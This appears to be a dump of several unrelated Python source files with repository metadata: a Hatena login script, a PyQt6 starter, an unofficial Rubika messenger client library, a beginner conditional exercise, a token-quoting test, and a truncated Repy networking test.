ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
main.py
ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
#!python3 #encoding:utf-8 from urllib.request import build_opener, HTTPCookieProcessor from urllib.parse import urlencode from http.cookiejar import CookieJar import pprint import dataset class HatenaSite(object): def __init__(self, path_hatena_accounts_sqlite3): self.path_hatena_accounts_sqlite3 = path_hatena_accounts_sqlite3 self.db_accounts = dataset.connect('sqlite:///' + path_hatena_accounts_sqlite3) def login(self, hatena_id): account = self.db_accounts['Accounts'].find_one(HatenaId=hatena_id) if (None == account): print('{0} のはてなIDを持ったアカウント情報は次のDBに存在しません。: {1}'.format(hatena, self.path_hatena_accounts_sqlite3)) return print(account['Password']) opener = build_opener(HTTPCookieProcessor(CookieJar())) post = { 'name': hatena_id, 'password': account['Password'] } data = urlencode(post).encode('utf-8') res = opener.open('https://www.hatena.ne.jp/login', data) pprint.pprint(res.getheaders()) res.close() url = 'http://f.hatena.ne.jp/{0}/{1}/rss'.format(hatena_id, 'Hatena Blog') res = opener.open(url) with open('photo_life.xml', 'wb') as f: f.write(res.read()) res.close() if __name__ == '__main__': hatena_id = 'ytyaru' client = HatenaSite( path_hatena_accounts_sqlite3 = "meta_Hatena.Accounts.sqlite3" ) client.login(hatena_id)
33.088889
110
0.646071
173
1,489
5.312139
0.421965
0.106638
0.159956
0.163221
0.126224
0
0
0
0
0
0
0.012195
0.229013
1,489
44
111
33.840909
0.788328
0.014775
0
0.057143
0
0
0.151639
0.040301
0
0
0
0
0
1
0.057143
false
0.057143
0.142857
0
0.257143
0.114286
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
0511c5e889756be6d1498e4e5630fe4522e1af10
176
py
Python
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
1
2021-09-20T21:48:11.000Z
2021-09-20T21:48:11.000Z
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
null
null
null
dzien1/p1_start.py
angelm1974/przyklady
ee0483ca69b789270641f3cd6c945b0cd0afbea9
[ "MIT" ]
null
null
null
from PyQt6.QtWidgets import QApplication, QWidget import sys # komentarz app = QApplication(sys.argv) # ([]) -bez argumentów window = QWidget() window.show() app.exec()
14.666667
52
0.715909
21
176
6
0.714286
0
0
0
0
0
0
0
0
0
0
0.006757
0.159091
176
11
53
16
0.844595
0.170455
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
051e064cf78fe1b3efaa1e563322f576984f94e9
24,624
py
Python
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
23
2021-12-06T09:54:01.000Z
2022-03-31T19:44:29.000Z
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
4
2022-01-08T19:27:40.000Z
2022-03-30T13:18:23.000Z
rubika/client.py
Bahman-Ahmadi/rubika
924e82434f9468cadf481af7b29695f642af7e99
[ "MIT" ]
13
2021-12-08T14:18:39.000Z
2022-03-30T13:20:37.000Z
from pathlib import Path from requests import post from random import randint from json import loads, dumps import random, datetime, rubika.encryption # because should be exist ! adminsAccess = { "pin":"PinMessages", "newAdmin":"SetAdmin", "editInfo":"ChangeInfo", "banMember":"BanMember", "changeLink":"SetJoinLink", "changeMembersAccess":"SetMemberAccess", "deleteMessages":"DeleteGlobalAllMessages" } usersAccess = { "addMember":"AddMember", "viewAdmins":"ViewAdmins", "viewMembers":"ViewMembers", "sendMessage":"SendMessages" } class Bot: def __init__(self, auth): self.auth = auth self.enc = rubika.encryption.encryption(auth) @staticmethod def _getURL(): return "https://messengerg2c64.iranlms.ir/" ''' result = [] for i in range(11,99): result.append(f"https://messengerg2c{i}.iranlms.ir/") return random.choice(result) ''' def _requestSendFile(self, file): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"requestSendFile", "input":{ "file_name": str(file.split("/")[-1]), "mime": file.split(".")[-1], "size": Path(file).stat().st_size }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json()["data_enc"]))["data"] def _uploadFile(self, file): frequest = Bot._requestSendFile(self, file) bytef = open(file,"rb").read() hash_send = frequest["access_hash_send"] file_id = frequest["id"] url = frequest["upload_url"] header = { 'auth':self.auth, 'Host':url.replace("https://","").replace("/UploadFile.ashx",""), 'chunk-size':str(Path(file).stat().st_size), 'file-id':str(file_id), 'access-hash-send':hash_send, "content-type": "application/octet-stream", "content-length": str(Path(file).stat().st_size), "accept-encoding": "gzip", "user-agent": "okhttp/3.12.1" } if len(bytef) <= 131072: header["part-number"], header["total-part"] = "1","1" while True: try: j = post(data=bytef,url=url,headers=header).text j = loads(j)['data']['access_hash_rec'] break except Exception as e: continue return [frequest, j] else: t = random._floor(len(bytef) / 131072 + 1) for i in range(1,t+1): if i != t: k = i - 1 k = k * 131072 while True: try: header["chunk-size"], header["part-number"], header["total-part"] = "131072", str(i),str(t) o = post(data=bytef[k:k + 131072],url=url,headers=header).text o = loads(o)['data'] break except Exception as e: continue else: k = i - 1 k = k * 131072 while True: try: header["chunk-size"], header["part-number"], header["total-part"] = str(len(bytef[k:])), str(i),str(t) p = post(data=bytef[k:],url=url,headers=header).text p = loads(p)['data']['access_hash_rec'] break except Exception as e: continue return [frequest, p] def sendMessage(self, chat_id, text, metadata=[], message_id=None): inData = { "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "text":text, "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if metadata != [] : inData["input"]["metadata"] = {"meta_data_parts":metadata} return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))},url=Bot._getURL()) def editMessage(self, message_id, chat_id, newText): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"editMessage", "input":{ "message_id": message_id, "object_guid": chat_id, "text": newText }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def deleteMessages(self, chat_id, message_ids): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"deleteMessages", "input":{ "object_guid":chat_id, "message_ids":message_ids, "type":"Global" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def getUserInfo(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getUserInfo", "input":{ "user_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json()["data_enc"])) def getMessages(self, chat_id,min_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesInterval", "input":{ "object_guid":chat_id, "middle_message_id":min_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("messages") def getInfoByUsername(self, username): ''' username should be without @ ''' return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getObjectByUsername", "input":{ "username":username }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))) def banGroupMember(self, chat_id, user_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"banGroupMember", "input":{ "group_guid": chat_id, "member_guid": user_id, "action":"Set" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def invite(self, chat_id, user_ids): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"addGroupMembers", "input":{ "group_guid": chat_id, "member_guids": user_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def getGroupAdmins(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "client":{ "app_name":"Main", "app_version":"2.9.5", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "input":{ "group_guid":chat_id }, "method":"getGroupAdminMembers" }))},url=Bot._getURL()).json().get("data_enc"))) def getMessagesInfo(self, chat_id, message_ids): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesByID", "input":{ "object_guid": chat_id, "message_ids": message_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url=Bot._getURL()).json()["data_enc"])).get("data").get("messages") def setMembersAccess(self, chat_id, access_list): return post(json={ "api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "access_list": access_list, "group_guid": chat_id })), "method": "setGroupDefaultAccess" }, url=Bot._getURL()) def getGroupMembers(self, chat_id): return loads(self.enc.decrypt(post(json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupAllMembers", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } })) }, url=Bot._getURL()).json()["data_enc"]))["data"]["in_chat_members"] def getGroupInfo(self, chat_id): return loads(self.enc.decrypt(post( json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupInfo", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url=Bot._getURL()).json()["data_enc"])) def getGroupLink(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getGroupLink", "input":{ "group_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("join_link") def changeGroupLink(self, chat_id): return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "data_enc":self.enc.encrypt(dumps({ "group_guid": chat_id })), "method":"setGroupLink", },url=Bot._getURL()) def setGroupTimer(self, chat_id, time): return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "group_guid": chat_id, "slow_mode": time, "updated_parameters":["slow_mode"] })), "method":"editGroupInfo" },url=Bot._getURL()) def setGroupAdmin(self, chat_id, user_id, access_list=[]): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setGroupAdmin", "input":{ "group_guid": chat_id, "access_list": access_list, "action": "SetAdmin", "member_guid": user_id }, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" } }))},url=Bot._getURL()) def deleteGroupAdmin(self, chat_id, user_id, access_list=[]): return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setGroupAdmin", "input":{ "group_guid": chat_id, "action": "UnsetAdmin", "member_guid": user_id }, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" } }))},url=Bot._getURL()) def logout(self): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"logout", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def forwardMessages(self, From, message_ids, to): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"forwardMessages", "input":{ "from_object_guid": From, "message_ids": message_ids, "rnd": f"{randint(100000,999999999)}", "to_object_guid": to }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def seenChats(self, seenList): # seenList should be a dict , keys are object guids and values are last message’s id, {"guid":"msg_id"} return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"seenChats", "input":{ "seen_list": seenList }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def sendChatAction(self, chat_id, action): #every some seconds before sending message this request should send return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendChatActivity", "input":{ "activity": action, "object_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def pin(self, chat_id, message_id): return post(json={"api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "action":"Pin", "message_id": message_id, "object_guid": chat_id })), "method": "setPinMessage" },url=Bot._getURL()) def unpin(self, chat_id, message_id): return post(json={"api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "action":"Unpin", "message_id": message_id, "object_guid": chat_id })), "method": "setPinMessage" },url=Bot._getURL()) def joinGroup(self, link): hashLink = link.split("/")[-1] return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"joinGroup", "input":{ "hash_link": hashLink }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def leaveGroup(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"leaveGroup", "input":{ "group_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def block(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setBlockUser", "input":{ "action": "Block", "user_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def unblock(self, chat_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"setBlockUser", "input":{ "action": "Unblock", "user_guid": chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()) def sendPhoto(self, chat_id, file, size, thumbnail=None, caption=None, message_id=None): uresponse = Bot._uploadFile(self, file) file_inline = { "dc_id": uresponse[0]["dc_id"], "file_id": uresponse[0]["id"], "type":"Image", "file_name": file.split("/")[-1], "size": str(Path(file).stat().st_size), "mime": file.split(".")[-1], "access_hash_rec": uresponse[1], "width": size[0], "height": size[1], "thumb_inline": thumbnail or "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" } inData = { "method":"sendMessage", "input":{ "file_inline": file_inline, "object_guid": chat_id, "rnd": f"{randint(100000,999999999)}", "reply_to_message_id": message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = {"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))} return post(json=data,url=Bot._getURL()) def sendVoice(self, chat_id, file, time, caption=None, message_id=None): # file's format should be ogg. time should be ms (type: float). uresponse = Bot._uploadFile(self, file) inData = { "method":"sendMessage", "input":{ "file_inline": { "dc_id": uresponse[0]["dc_id"], "file_id": uresponse[0]["id"], "type":"Voice", "file_name": file.split("/")[-1], "size": str(Path(file).stat().st_size), "time": time, "mime": file.split(".")[-1], "access_hash_rec": uresponse[1], }, "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "reply_to_message_id":message_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = { "api_version":"5", "auth":self.auth, "data_enc":self.enc.encrypt(dumps(inData)) } return post(json=data,url=Bot._getURL()) def sendDocument(self, chat_id, file, caption=None, message_id=None): # Bot.sendDocument("guid","./file.txt", caption="anything", message_id="12345678") uresponse = Bot._uploadFile(self, file) file_id = str(uresponse[0]["id"]) mime = file.split(".")[-1] dc_id = uresponse[0]["dc_id"] access_hash_rec = uresponse[1] file_name = file.split("/")[-1] size = str(Path(file).stat().st_size) inData = { "method":"sendMessage", "input":{ "object_guid":chat_id, "reply_to_message_id":message_id, "rnd":f"{randint(100000,999999999)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"File", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } } if caption != None: inData["input"]["text"] = caption data = { "api_version":"5", "auth":self.auth, "data_enc":self.enc.encrypt(dumps(inData)) } while True: try: return loads(self.enc.decrypt(loads(post(json=data,url=Bot._getURL()).text)['data_enc'])) break except: continue def sendLocation(self, chat_id, location, message_id=None): # location = [float(x), float(y)] return post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "is_mute": False, "object_guid":chat_id, "rnd":f"{randint(100000,999999999)}", "location":{ "latitude": location[0], "longitude": location[1] }, "reply_to_message_id":message_id })), "method":"sendMessage" },url=Bot._getURL()) def searchInChannelMembers(self, text, channel_guid): try: return loads(self.enc.decrypt(post(json={ "api_version":"4", "auth":self.auth, "client":{ "app_name":"Main", "app_version":"2.8.1", "platform":"Android", "package":"ir.resaneh1.iptv", "lang_code":"fa" }, "data_enc":self.enc.encrypt(dumps({ "channel_guid": channel_guid, "search_text": text })), "method":"getChannelAllMembers" },url=Bot._getURL()).json()["data_enc"]))["in_chat_members"] except KeyError: return None def getChatsUpdate(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getChatsUpdates", "input":{ "state":time_stamp, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("chats") def getChatUpdate(self, chat_id): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesUpdates", "input":{ "object_guid":chat_id, "state":time_stamp }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("updated_messages") def myStickerSet(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMyStickerSets", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url=Bot._getURL()).json().get("data_enc"))).get("data") class Socket: data = {"error":[],"messages":[]} def __init__(self, auth): self.auth = auth self.enc = rubika.encryption.encryption(auth) def on_open(self, ws): def handShake(*args): ws.send(dumps({ "api_version": "4", "auth": self.auth, "data_enc": "", "method": "handShake" })) import _thread _thread.start_new_thread(handShake, ()) def on_error(self, ws, error): Socket.data["error"].append(error) def on_message(self, ws, message): try: parsedMessage = loads(message) Socket.data["messages"].append({"type": parsedMessage["type"], "data": loads(self.enc.decrypt(parsedMessage["data_enc"]))}) except KeyError: pass def on_close(self, ws, code, msg): return {"code": code, "message": msg} def handle(self, OnOpen=None, OnError=None, OnMessage=None, OnClose=None, forEver=True): import websocket ws = websocket.WebSocketApp( "wss://jsocket3.iranlms.ir:80", on_open=OnOpen or Socket(self.auth).on_open, on_message=OnMessage or Socket(self.auth).on_message, on_error=OnError or Socket(self.auth).on_error, on_close=OnClose or Socket(self.auth).on_close ) if forEver : ws.run_forever()
29.349225
2,034
0.634665
2,970
24,624
5.091582
0.123906
0.022219
0.032535
0.034255
0.601971
0.571816
0.53895
0.535181
0.524732
0.507406
0
0.03091
0.163093
24,624
839
2,035
29.349225
0.702882
0.016244
0
0.613666
0
0.001314
0.368978
0.093771
0
1
0
0
0
1
0.061761
false
0.001314
0.009198
0.036794
0.128778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
2
051f4dab5a5f1bed25333ea9cb6d58c8c48a834b
424
py
Python
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
null
null
null
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
17
2019-12-01T16:56:29.000Z
2022-03-02T04:49:51.000Z
lpyHardway/logic/ex2.py
oreanroy/learn_modules
fb1debc612940b65c409d8f5b35a3b4e16e67494
[ "MIT" ]
1
2019-09-28T00:43:54.000Z
2019-09-28T00:43:54.000Z
people = 30 cars = 40 buses = 15 if cars > people: print "We should take the cars." elif cars < people: print "we should not take the cars." else: print "we can't decide." if buses > cars: print " That's too many buses" elif buses < cars: print " Maybe we could take the bus." else: print "we stil can't decide." if people > buses: print " Alright lets take the buses." else: print "Fine, let's stay home then."
17.666667
38
0.676887
74
424
3.878378
0.445946
0.097561
0.10453
0.118467
0.160279
0
0
0
0
0
0
0.018127
0.21934
424
23
39
18.434783
0.848943
0
0
0.157895
0
0
0.463357
0
0
0
0
0
0
0
null
null
0
0
null
null
0.421053
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
05260b29fa65b53dc965a1c89ebcef95a1a96d54
396
py
Python
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
test/config_generator_test.py
jnohlgard/projector-installer
52aeaa936aa21d9fa6aee109d78e209fa068821b
[ "Apache-2.0" ]
null
null
null
"""Test config_generator.py module""" from unittest import TestCase from projector_installer.config_generator import token_quote class ConfigGeneratorTest(TestCase): """Test config_generator.py module""" def test_token_quote(self) -> None: """The token_quote method must return the same token in quotes""" self.assertEqual(token_quote('some_token'), '\"some_token\"')
30.461538
73
0.739899
50
396
5.64
0.54
0.141844
0.134752
0.148936
0.191489
0
0
0
0
0
0
0
0.151515
396
12
74
33
0.839286
0.310606
0
0
0
0
0.093385
0
0
0
0
0
0.2
1
0.2
false
0
0.4
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
053268be449fba403f273951c902bae23a8253b1
333
py
Python
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
1
2021-08-18T05:58:17.000Z
2021-08-18T05:58:17.000Z
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
3
2015-11-17T21:01:03.000Z
2016-07-14T09:08:04.000Z
tests/ut_repytests_loose-testnetmessportreuse.py
SeattleTestbed/repy_v1
f40a02e2e398b1ec67fede84b41a264ae7356d2c
[ "MIT" ]
5
2015-07-02T13:29:23.000Z
2021-09-25T07:48:30.000Z
#pragma out #pragma repy restrictions.loose def foo(ip,port,mess, ch): print ip,port,mess,ch stopcomm(ch) def noop(a,b,c,d): pass if callfunc == 'initialize': ip = getmyip() noopch = recvmess(ip,<messport>,noop) recvmess(ip,<messport1>,foo) sleep(.1) sendmess(ip,<messport1>,'hi',ip,<messport>) stopcomm(noopch)
18.5
45
0.678679
50
333
4.52
